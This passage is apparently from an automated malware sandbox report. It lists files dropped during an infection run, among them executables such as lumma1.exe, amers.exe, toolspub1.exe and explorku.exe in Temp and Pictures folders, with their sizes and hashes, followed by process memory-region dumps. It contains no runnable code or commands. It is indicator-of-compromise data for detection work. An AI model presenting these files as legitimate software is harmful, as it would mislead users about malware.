                              34f3b507c9ae5e2307c07c2227fd813e50684734077f6e0b1b72db27a64877f2266296f7e6898efedb0ef3baaf2c09e8d11529169573146460da15c6768e81be

                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                              Filesize

                              2KB

                              MD5

                              a6ea7bfcd3aac150c0caef765cb52281

                              SHA1

                              037dc22c46a0eb0b9ad4c74088129e387cffe96b

                              SHA256

                              f019af2e5e74cdf13c963910500f9436c66b6f2901f5056d72f82310f20113b9

                              SHA512

                              c8d2d373b48a26cf6eec1f5cfc05819011a3fc49d863820ad07b6442dd6d5f64e27022a9e4c381eb58bf7f6b19f8e77d508734ff803073ec2fb32da9081b6f23

                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports

                              Filesize

                              2B

                              MD5

                              d751713988987e9331980363e24189ce

                              SHA1

                              97d170e1550eee4afc0af065b78cda302a97674c

                              SHA256

                              4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                              SHA512

                              b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                              Filesize

                              21KB

                              MD5

                              f1833da3a03aa30e6e8900ccc5c0fafc

                              SHA1

                              b6b6316144f42a5e248523b9ec9a948ddb252529

                              SHA256

                              8c3597acd1fa5d674498339efeac798433bb1d09d677b3183a8cc575de3c59c9

                              SHA512

                              d01e6a3eae855911d1a33f8091f25ec2f26622286a48112963cbb30572fd9398b66c6083a39ec39fb8988f2500484b682c7dc1fbabebae96ea65a43e1b644cc4

                            • C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe

                              Filesize

                              1.8MB

                              MD5

                              28c474451853446abe7971cf9d2c4b4c

                              SHA1

                              7cb24e9633034b04ef8bd294c5df2240259c28c5

                              SHA256

                              7ae609ce947e005ddfd6bba4505a5cd5ec897e8bf55d304e2d8a56fa961f545d

                              SHA512

                              3dbdb4d8edd84a31633f6e613f61c4636f41ba306dc9a3b2febdedfa9b3dfe61c6d13514ba9daf1ae619b4f3444ecc10ed4138fb0480f9839083996aa0f93c38

                            • C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe

                              Filesize

                              1.2MB

                              MD5

                              56e7d98642cfc9ec438b59022c2d58d7

                              SHA1

                              26526f702e584d8c8b629b2db5d282c2125665d7

                              SHA256

                              a2aa61942bae116f8c855fda0e9a991dba92b3a1e2f147aee0e7e2be1bdea383

                              SHA512

                              0be0b11de472029bd4e2268cddb5ddb381f7f275dfe50c47b9c836980e5cbfa7f71fe78804ef2180ee110ca9cf36944ec8b8b22babb31a1fc7a6585f79932a1f

                            • C:\Users\Admin\AppData\Local\Temp\1000011001\installer.exe

                              Filesize

                              621KB

                              MD5

                              611a4246c5aabf1594344d7bd3fccb4c

                              SHA1

                              cf0e6b3ecb479a8bdb7421090ecc89148db9f83b

                              SHA256

                              aa34e0bb1a7400fd7430922307c36441290730d07f48f982f01d4bad2fde3d0e

                              SHA512

                              0daff7de219bcc38ddc8ddf261993b6e870605fbf6ec194e08651b293008a8a42c0c13780482f7fc45e3a5f509b644430311cb382be632075544e61dc63fe23e

                            • C:\Users\Admin\AppData\Local\Temp\1000013001\file300un.exe

                              Filesize

                              30.6MB

                              MD5

                              33787bb1279b90b829281fadd9842da7

                              SHA1

                              232be73341f6211f20e289fde16988790f62fe33

                              SHA256

                              a94db0a466893661cb536296f2f12ca0799d6fc796829584f5141ad0adee3fcc

                              SHA512

                              863edf4d9aafa7cea85e663dd0d6435137fd2ebc76cc8221b38dd7155d715e563d3502faba6a6858afbef2898cb44924b53ea71793ac90125004e79985a4419d

                            • C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe

                              Filesize

                              418KB

                              MD5

                              0099a99f5ffb3c3ae78af0084136fab3

                              SHA1

                              0205a065728a9ec1133e8a372b1e3864df776e8c

                              SHA256

                              919ae827ff59fcbe3dbaea9e62855a4d27690818189f696cfb5916a88c823226

                              SHA512

                              5ac4f3265c7dd7d172284fb28c94f8fc6428c27853e70989f4ec4208f9897be91720e8eee1906d8e843ab05798f3279a12492a32e8a118f5621ac5e1be2031b6

                            • C:\Users\Admin\AppData\Local\Temp\1000254001\ISetup8.exe

                              Filesize

                              386KB

                              MD5

                              258e2128803910f3b69a21d5bae342c4

                              SHA1

                              fa9bb27e5804e43b268f063b69d40d8b9d6e05fc

                              SHA256

                              7954fe796c7bdfd2286b9c29349d8f349f02a0cb53e19bb5bbeaef65108f9e33

                              SHA512

                              03027a8add75e227870f8db62472807709c7343be3376b8791c38c94a2f6a22859da21c6c2672e65a6ca1e9e697a6c63d094b1d03ff7ad150c1f52ff31cbcd42

                            • C:\Users\Admin\AppData\Local\Temp\1000255001\toolspub1.exe

                              Filesize

                              240KB

                              MD5

                              6bcbbfac4eb7dbecb5a44983645a75db

                              SHA1

                              06335c12d2dc398efa4956674628debaf8a22b39

                              SHA256

                              f73c2ff7df05fca90c08e6ac7a30b97f56a5f62ddc1aed09e0970dc416f995aa

                              SHA512

                              550b13098d9842bc79b441721b6a93f085d75c274d7b5e0387fae87f9cf5a3566fb13694b5369149e093cb41a109fa015a9698f0553827c8c46c864083a54a33

                            • C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe

                              Filesize

                              4.1MB

                              MD5

                              eb00d146a50bfc74d8281f4cca8fe3bc

                              SHA1

                              54761a16f66a52fdf5d878c9b5a2dcc964c93006

                              SHA256

                              fd23d52e2ce8268f9648e5239256f5960e62d681315653c776eea49f45ec7c15

                              SHA512

                              8d65e62e4a651b20f29a731e56f5cd08f1601dd97dfb5863d5c471303eed25981a0cf523c3fa1e672a59f599583aaca81e466575cb2c0609408c7a686f934019

                            • C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe

                              Filesize

                              1.8MB

                              MD5

                              a545015277adb79890693c2aa95bd1ad

                              SHA1

                              64d174ec5dedfc9e25887213221fb171707ef8a7

                              SHA256

                              2048bcca69c7a5f69d1b2fc41ab46116de52fc22e3d165ecd98c37f97d727205

                              SHA512

                              560e9f3bc48a8e40133336f320feb22774c0da73c6947af4a159b881086ab07d60326f63c4cd41041fee23b9223188243ce1a121cdb200751ef068bf9499eb37

                            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ib14dngi.ty3.ps1

                              Filesize

                              60B

                              MD5

                              d17fe0a3f47be24a6453e9ef58c94641

                              SHA1

                              6ab83620379fc69f80c0242105ddffd7d98d5d9d

                              SHA256

                              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                              SHA512

                              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                            • C:\Users\Admin\AppData\Local\Temp\file-rk1k2sl3k.tmp

                              Filesize

                              20KB

                              MD5

                              e5715583f80cabb8d96141c2e5f1054b

                              SHA1

                              8a99faf0188e32c55032f09cc76a95da486b1d2d

                              SHA256

                              bd2158f444bb7170f851b093082b2f4c5771a117b79823d5faccdf7c4b379bfb

                              SHA512

                              8e884b460296e99314efb381895aec806b1a13deece08624ead1b576a9becc77c0cae769eeba755437387837abdebda5efba64ce0e62c2b72c5fd09c97571961

                            • C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

                              Filesize

                              2KB

                              MD5

                              209453aa2b469fbb5e24d1fd323d584a

                              SHA1

                              714d6497483666924842f06b3255e5d30ac1fc38

                              SHA256

                              165f6beb70ddd804c6876fe30f7436c3fc4af39f0060d7f5180e87b92f1e98cd

                              SHA512

                              5b772fab9bde0bac31571c793579dc2e70013f54f8036257caa747599ce0b51df71da65bea1f801fb9eb81adac690c96acf2e9193b0ac8a9fad0208eb018a584

                            • C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

                              Filesize

                              3KB

                              MD5

                              ce8274aad70de53ade21c54f0e1ee06b

                              SHA1

                              010d26cfea9ee15cde92f144b8a9ccb8faf4199a

                              SHA256

                              8b286e619a11890dab9419023d2609192034e122e269e3703b877f6a4608f89c

                              SHA512

                              dc532a82f3098b71fe0b7d102f6c85008f5b3a07d052d329104b6047436721458867bb68424a017f65eba1b2911838c0090b27052f27cbef6a5b1cec7e151780

                            • C:\Users\Admin\AppData\Local\Temp\u1n4.0.exe

                              Filesize

                              239KB

                              MD5

                              431c601846123a7b4aa67d75e31a3dfd

                              SHA1

                              0704a6551c01b3b5744e7b743b33ffa5be2b4ced

                              SHA256

                              0a9eab89753e07a01b1c5e0197acefea9cc05e5f7829823f811e7aa1d7b817b7

                              SHA512

                              87a0f6eb99baf620b25216ba491f4891154224ad44ecbbe209c5189585d4cc8abea25ef7b34d78608f074c00ce76374fe49252d76b693521363aced52e4cda27

                            • C:\Users\Admin\AppData\Local\Temp\u1n4.1.exe

                              Filesize

                              4.6MB

                              MD5

                              397926927bca55be4a77839b1c44de6e

                              SHA1

                              e10f3434ef3021c399dbba047832f02b3c898dbd

                              SHA256

                              4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7

                              SHA512

                              cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954

                            • C:\Users\Admin\Pictures\55hXfWg1qZszuDybS5qUeTwg.exe

                              Filesize

                              4.1MB

                              MD5

                              2463bc169118824c8264b9420eb940d8

                              SHA1

                              7e638671d057095aa187d532891badaa821b2c9d

                              SHA256

                              992c4b02b1cfd57cea43ff3185055dd845d2fb39d9ee3d369b3f0842c7c5de1b

                              SHA512

                              5bd197b8941c2f06525800e097f9dcc7061763b16433e7bb7e55ece837f9393b3c5efd8069de5b1bc6c90364346d2f6ff36f96b78f3db88828b53898c406c87b

                            • C:\Users\Admin\Pictures\I3ZphvRnDbR3bhhsuxaPJKtb.exe

                              Filesize

                              7KB

                              MD5

                              77f762f953163d7639dff697104e1470

                              SHA1

                              ade9fff9ffc2d587d50c636c28e4cd8dd99548d3

                              SHA256

                              d9e15bb8027ff52d6d8d4e294c0d690f4bbf9ef3abc6001f69dcf08896fbd4ea

                              SHA512

                              d9041d02aaca5f06a0f82111486df1d58df3be7f42778c127ccc53b2e1804c57b42b263cc607d70e5240518280c7078e066c07dec2ea32ec13fb86aa0d4cb499

                            • C:\Users\Admin\Pictures\UFQnVOvaLK3pNgTPUJBUc789.exe

                              Filesize

                              386KB

                              MD5

                              0513304ac8178fa00bce7b395fa824d0

                              SHA1

                              a10f045ae42a32cc223fb81d121a074f1cfb6085

                              SHA256

                              08acad39a18e3a380043252aaa097232c57f3e1b0e587d4fb88351b28698f942

                              SHA512

                              039619a83b493790bc47010daa09f657a597009a77d7639b22a37346ce9fb6fce83e906f4a68cc6575a33d9ccebe8cd1662d856de3c32cfe7c235316c4f39e9a

                            • C:\Users\Admin\Pictures\c32VbdEYRsdEsPrNP8QUGh7r.exe

                              Filesize

                              4.1MB

                              MD5

                              f10a5a07ed8ccffe12a82da7202f7118

                              SHA1

                              01062834bfed6afa56fe7ab8b40315a7c8ca5d94

                              SHA256

                              bd05b98c919a11070f8b7b956b240456dff45efb1d9b8efd851c7d1072338460

                              SHA512

                              25afe6a9f72d26392077e23297d66dd971995f1b57e70358dd962f35f343e7dff3db73b7da52afb624af2071fe8a10f2baf3cf3cd82eb88205428722bd85b50c

                            • C:\Users\Admin\Pictures\qHVLqqVHQ2ZDeiOYS1BMiFNe.exe

                              Filesize

                              3.3MB

                              MD5

                              04649ccce574df25cdf0213801e70df0

                              SHA1

                              3daca768f1370150f03d85ee982c249d24d92d91

                              SHA256

                              0ef26b403a756f0aada204fefe27f5d0cb50c5f03e30f229bff8a165e1ba6663

                              SHA512

                              1f9d48b09277601fc2520d1983262101af1bc50fe1b52b8e5f51929d7dd527e0770f8ba8571b8dff700f9917f1e6e3444ce8edb126b43cbe145b87968b41e48a

                            • C:\Windows\System32\GroupPolicy\gpt.ini

                              Filesize

                              127B

                              MD5

                              8ef9853d1881c5fe4d681bfb31282a01

                              SHA1

                              a05609065520e4b4e553784c566430ad9736f19f

                              SHA256

                              9228f13d82c3dc96b957769f6081e5bac53cffca4ffde0ba1e102d9968f184a2

                              SHA512

                              5ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005

                            • memory/440-636-0x0000000000220000-0x00000000006E1000-memory.dmp

                              Filesize

                              4.8MB

                            • memory/896-132-0x0000000000220000-0x00000000006E1000-memory.dmp

                              Filesize

                              4.8MB

                            • memory/896-138-0x0000000000220000-0x00000000006E1000-memory.dmp

                              Filesize

                              4.8MB

                            • memory/1200-621-0x0000000000EE0000-0x000000000138B000-memory.dmp

                              Filesize

                              4.7MB

                            • memory/1200-602-0x0000000000EE0000-0x000000000138B000-memory.dmp

                              Filesize

                              4.7MB

                            • memory/1252-700-0x00000000060B0000-0x0000000006404000-memory.dmp

                              Filesize

                              3.3MB

                            • memory/1268-458-0x0000000000400000-0x0000000000408000-memory.dmp

                              Filesize

                              32KB

                            • memory/1608-145-0x0000000000220000-0x00000000006E1000-memory.dmp

                              Filesize

                              4.8MB

                            • memory/1608-403-0x0000000000220000-0x00000000006E1000-memory.dmp

                              Filesize

                              4.8MB

                            • memory/1608-268-0x0000000000220000-0x00000000006E1000-memory.dmp

                              Filesize

                              4.8MB

                            • memory/1608-271-0x0000000000220000-0x00000000006E1000-memory.dmp

                              Filesize

                              4.8MB

                            • memory/1608-253-0x0000000000220000-0x00000000006E1000-memory.dmp

                              Filesize

                              4.8MB

                            • memory/1608-360-0x0000000000220000-0x00000000006E1000-memory.dmp

                              Filesize

                              4.8MB

                            • memory/1608-250-0x0000000000220000-0x00000000006E1000-memory.dmp

                              Filesize

                              4.8MB

                            • memory/1608-71-0x0000000000220000-0x00000000006E1000-memory.dmp

                              Filesize

                              4.8MB

                            • memory/1608-140-0x0000000000220000-0x00000000006E1000-memory.dmp

                              Filesize

                              4.8MB

                            • memory/1608-141-0x0000000000220000-0x00000000006E1000-memory.dmp

                              Filesize

                              4.8MB

                            • memory/1608-143-0x0000000000220000-0x00000000006E1000-memory.dmp

                              Filesize

                              4.8MB

                            • memory/1608-257-0x0000000000220000-0x00000000006E1000-memory.dmp

                              Filesize

                              4.8MB

                            • memory/1608-16-0x0000000000220000-0x00000000006E1000-memory.dmp

                              Filesize

                              4.8MB

                            • memory/1608-152-0x0000000000220000-0x00000000006E1000-memory.dmp

                              Filesize

                              4.8MB

                            • memory/1608-21-0x0000000000220000-0x00000000006E1000-memory.dmp

                              Filesize

                              4.8MB

                            • memory/1608-147-0x0000000000220000-0x00000000006E1000-memory.dmp

                              Filesize

                              4.8MB

                            • memory/1608-20-0x0000000000220000-0x00000000006E1000-memory.dmp

                              Filesize

                              4.8MB

                            • memory/1608-19-0x0000000000220000-0x00000000006E1000-memory.dmp

                              Filesize

                              4.8MB

                            • memory/1668-133-0x000000001B940000-0x000000001B962000-memory.dmp

                              Filesize

                              136KB

                            • memory/1668-154-0x000000001BB00000-0x000000001BB12000-memory.dmp

                              Filesize

                              72KB

                            • memory/1668-144-0x000000001F540000-0x000000001F55C000-memory.dmp

                              Filesize

                              112KB

                            • memory/1668-119-0x0000000000D30000-0x0000000000DD2000-memory.dmp

                              Filesize

                              648KB

                            • memory/1668-136-0x000000001D4C0000-0x000000001D682000-memory.dmp

                              Filesize

                              1.8MB

                            • memory/1668-135-0x000000001D820000-0x000000001DD48000-memory.dmp

                              Filesize

                              5.2MB

                            • memory/1668-134-0x000000001B920000-0x000000001B92A000-memory.dmp

                              Filesize

                              40KB

                            • memory/1748-319-0x000002DBF66B0000-0x000002DBF66BA000-memory.dmp

                              Filesize

                              40KB

                            • memory/1748-454-0x000002DBF8D50000-0x000002DBF8DAC000-memory.dmp

                              Filesize

                              368KB

                            • memory/1956-137-0x0000000000EE0000-0x000000000138B000-memory.dmp

                              Filesize

                              4.7MB

                            • memory/1956-131-0x0000000000EE0000-0x000000000138B000-memory.dmp

                              Filesize

                              4.7MB

                            • memory/2004-387-0x0000000000400000-0x0000000000793000-memory.dmp

                              Filesize

                              3.6MB

                            • memory/2012-2-0x00000000004A1000-0x00000000004CF000-memory.dmp

                              Filesize

                              184KB

                            • memory/2012-1-0x0000000077684000-0x0000000077686000-memory.dmp

                              Filesize

                              8KB

                            • memory/2012-18-0x00000000004A0000-0x0000000000961000-memory.dmp

                              Filesize

                              4.8MB

                            • memory/2012-5-0x00000000004A0000-0x0000000000961000-memory.dmp

                              Filesize

                              4.8MB

                            • memory/2012-3-0x00000000004A0000-0x0000000000961000-memory.dmp

                              Filesize

                              4.8MB

                            • memory/2012-0-0x00000000004A0000-0x0000000000961000-memory.dmp

                              Filesize

                              4.8MB

                            • memory/2128-406-0x0000000000400000-0x000000000259D000-memory.dmp

                              Filesize

                              33.6MB

                            • memory/2288-98-0x0000000000400000-0x0000000000458000-memory.dmp

                              Filesize

                              352KB

                            • memory/2288-100-0x0000000000400000-0x0000000000458000-memory.dmp

                              Filesize

                              352KB

                            • memory/2820-698-0x0000021676130000-0x0000021676430000-memory.dmp

                              Filesize

                              3.0MB

                            • memory/2820-731-0x0000021676480000-0x000002167648E000-memory.dmp

                              Filesize

                              56KB

                            • memory/2820-691-0x0000021675D10000-0x0000021675D3A000-memory.dmp

                              Filesize

                              168KB

                            • memory/2820-690-0x0000021675FE0000-0x0000021676092000-memory.dmp

                              Filesize

                              712KB

                            • memory/2820-692-0x00000216760E0000-0x0000021676130000-memory.dmp

                              Filesize

                              320KB

                            • memory/2820-694-0x0000021675CF0000-0x0000021675CFA000-memory.dmp

                              Filesize

                              40KB

                            • memory/2820-729-0x0000021676570000-0x0000021676578000-memory.dmp

                              Filesize

                              32KB

                            • memory/2820-689-0x0000021675230000-0x000002167523A000-memory.dmp

                              Filesize

                              40KB

                            • memory/2820-647-0x0000021675D90000-0x0000021675E9A000-memory.dmp

                              Filesize

                              1.0MB

                            • memory/2820-732-0x00000216764A0000-0x00000216764A8000-memory.dmp

                              Filesize

                              32KB

                            • memory/2820-652-0x0000021675980000-0x00000216759A4000-memory.dmp

                              Filesize

                              144KB

                            • memory/2820-648-0x0000021673930000-0x0000021673940000-memory.dmp

                              Filesize

                              64KB

                            • memory/2820-730-0x00000216764B0000-0x00000216764E8000-memory.dmp

                              Filesize

                              224KB

                            • memory/2820-649-0x0000021675220000-0x000002167522C000-memory.dmp

                              Filesize

                              48KB

                            • memory/2820-650-0x0000021673940000-0x0000021673954000-memory.dmp

                              Filesize

                              80KB

                            • memory/2820-639-0x000002166FCA0000-0x00000216734D4000-memory.dmp

                              Filesize

                              56.2MB

                            • memory/2836-500-0x00000000079D0000-0x0000000007A02000-memory.dmp

                              Filesize

                              200KB

                            • memory/2836-523-0x0000000007B40000-0x0000000007B51000-memory.dmp

                              Filesize

                              68KB

                            • memory/2836-460-0x0000000005DD0000-0x0000000005E36000-memory.dmp

                              Filesize

                              408KB

                            • memory/2836-471-0x0000000005EB0000-0x0000000006204000-memory.dmp

                              Filesize

                              3.3MB

                            • memory/2836-474-0x00000000065E0000-0x000000000662C000-memory.dmp

                              Filesize

                              304KB

                            • memory/2836-472-0x0000000006440000-0x000000000645E000-memory.dmp

                              Filesize

                              120KB

                            • memory/2836-455-0x0000000002B20000-0x0000000002B56000-memory.dmp

                              Filesize

                              216KB

                            • memory/2836-456-0x0000000005730000-0x0000000005D58000-memory.dmp

                              Filesize

                              6.2MB

                            • memory/2836-496-0x00000000069C0000-0x0000000006A04000-memory.dmp

                              Filesize

                              272KB

                            • memory/2836-497-0x0000000007570000-0x00000000075E6000-memory.dmp

                              Filesize

                              472KB

                            • memory/2836-499-0x0000000007610000-0x000000000762A000-memory.dmp

                              Filesize

                              104KB

                            • memory/2836-498-0x0000000007C70000-0x00000000082EA000-memory.dmp

                              Filesize

                              6.5MB

                            • memory/2836-501-0x000000006E5B0000-0x000000006E5FC000-memory.dmp

                              Filesize

                              304KB

                            • memory/2836-459-0x0000000005570000-0x0000000005592000-memory.dmp

                              Filesize

                              136KB

                            • memory/2836-502-0x000000006E7B0000-0x000000006EB04000-memory.dmp

                              Filesize

                              3.3MB

                            • memory/2836-512-0x0000000007A10000-0x0000000007A2E000-memory.dmp

                              Filesize

                              120KB

                            • memory/2836-513-0x0000000007A30000-0x0000000007AD3000-memory.dmp

                              Filesize

                              652KB

                            • memory/2836-514-0x0000000007B20000-0x0000000007B2A000-memory.dmp

                              Filesize

                              40KB

                            • memory/2836-518-0x00000000082F0000-0x0000000008386000-memory.dmp

                              Filesize

                              600KB

                            • memory/2836-461-0x0000000005E40000-0x0000000005EA6000-memory.dmp

                              Filesize

                              408KB

                            • memory/2836-550-0x0000000007BE0000-0x0000000007BE8000-memory.dmp

                              Filesize

                              32KB

                            • memory/2836-549-0x0000000007BF0000-0x0000000007C0A000-memory.dmp

                              Filesize

                              104KB

                            • memory/2836-547-0x0000000007B80000-0x0000000007B8E000-memory.dmp

                              Filesize

                              56KB

                            • memory/2836-548-0x0000000007BB0000-0x0000000007BC4000-memory.dmp

                              Filesize

                              80KB

                            • memory/3052-53-0x0000000000EE0000-0x000000000138B000-memory.dmp

                              Filesize

                              4.7MB

                            • memory/3052-254-0x0000000000EE0000-0x000000000138B000-memory.dmp

                              Filesize

                              4.7MB

                            • memory/3052-272-0x0000000000EE0000-0x000000000138B000-memory.dmp

                              Filesize

                              4.7MB

                            • memory/3052-249-0x0000000000EE0000-0x000000000138B000-memory.dmp

                              Filesize

                              4.7MB

                            • memory/3052-151-0x0000000000EE0000-0x000000000138B000-memory.dmp

                              Filesize

                              4.7MB

                            • memory/3052-150-0x0000000000EE0000-0x000000000138B000-memory.dmp

                              Filesize

                              4.7MB

                            • memory/3052-256-0x0000000000EE0000-0x000000000138B000-memory.dmp

                              Filesize

                              4.7MB

                            • memory/3052-146-0x0000000000EE0000-0x000000000138B000-memory.dmp

                              Filesize

                              4.7MB

                            • memory/3052-139-0x0000000000EE0000-0x000000000138B000-memory.dmp

                              Filesize

                              4.7MB

                            • memory/3052-267-0x0000000000EE0000-0x000000000138B000-memory.dmp

                              Filesize

                              4.7MB

                            • memory/3052-320-0x0000000000EE0000-0x000000000138B000-memory.dmp

                              Filesize

                              4.7MB

                            • memory/3052-404-0x0000000000EE0000-0x000000000138B000-memory.dmp

                              Filesize

                              4.7MB

                            • memory/3084-261-0x0000000000220000-0x00000000006E1000-memory.dmp

                              Filesize

                              4.8MB

                            • memory/3084-264-0x0000000000220000-0x00000000006E1000-memory.dmp

                              Filesize

                              4.8MB

                            • memory/3180-99-0x00000000007E0000-0x00000000007E1000-memory.dmp

                              Filesize

                              4KB

                            • memory/3180-97-0x00000000007E0000-0x00000000007E1000-memory.dmp

                              Filesize

                              4KB

                            • memory/3316-670-0x0000000140000000-0x0000000140B56000-memory.dmp

                              Filesize

                              11.3MB

                            • memory/3528-262-0x0000000000EE0000-0x000000000138B000-memory.dmp

                              Filesize

                              4.7MB

                            • memory/3528-266-0x0000000000EE0000-0x000000000138B000-memory.dmp

                              Filesize

                              4.7MB

                            • memory/3820-75-0x0000000000E30000-0x00000000014A9000-memory.dmp

                              Filesize

                              6.5MB

                            • memory/3820-74-0x0000000000E30000-0x00000000014A9000-memory.dmp

                              Filesize

                              6.5MB

                            • memory/3820-77-0x0000000000E30000-0x00000000014A9000-memory.dmp

                              Filesize

                              6.5MB

                            • memory/3820-76-0x0000000000E30000-0x00000000014A9000-memory.dmp

                              Filesize

                              6.5MB

                            • memory/3820-73-0x0000000000E30000-0x00000000014A9000-memory.dmp

                              Filesize

                              6.5MB

                            • memory/3820-87-0x0000000000E30000-0x00000000014A9000-memory.dmp

                              Filesize

                              6.5MB

                            • memory/3820-142-0x0000000000E30000-0x00000000014A9000-memory.dmp

                              Filesize

                              6.5MB

                            • memory/3820-86-0x0000000000E30000-0x00000000014A9000-memory.dmp

                              Filesize

                              6.5MB

                            • memory/3820-89-0x0000000000E30000-0x00000000014A9000-memory.dmp

                              Filesize

                              6.5MB

                            • memory/3820-88-0x0000000000E30000-0x00000000014A9000-memory.dmp

                              Filesize

                              6.5MB

                            • memory/4608-414-0x0000000061E00000-0x0000000061EF3000-memory.dmp

                              Filesize

                              972KB

                            • memory/4976-39-0x0000000000440000-0x00000000008EB000-memory.dmp

                              Filesize

                              4.7MB

                            • memory/4976-52-0x0000000000440000-0x00000000008EB000-memory.dmp

                              Filesize

                              4.7MB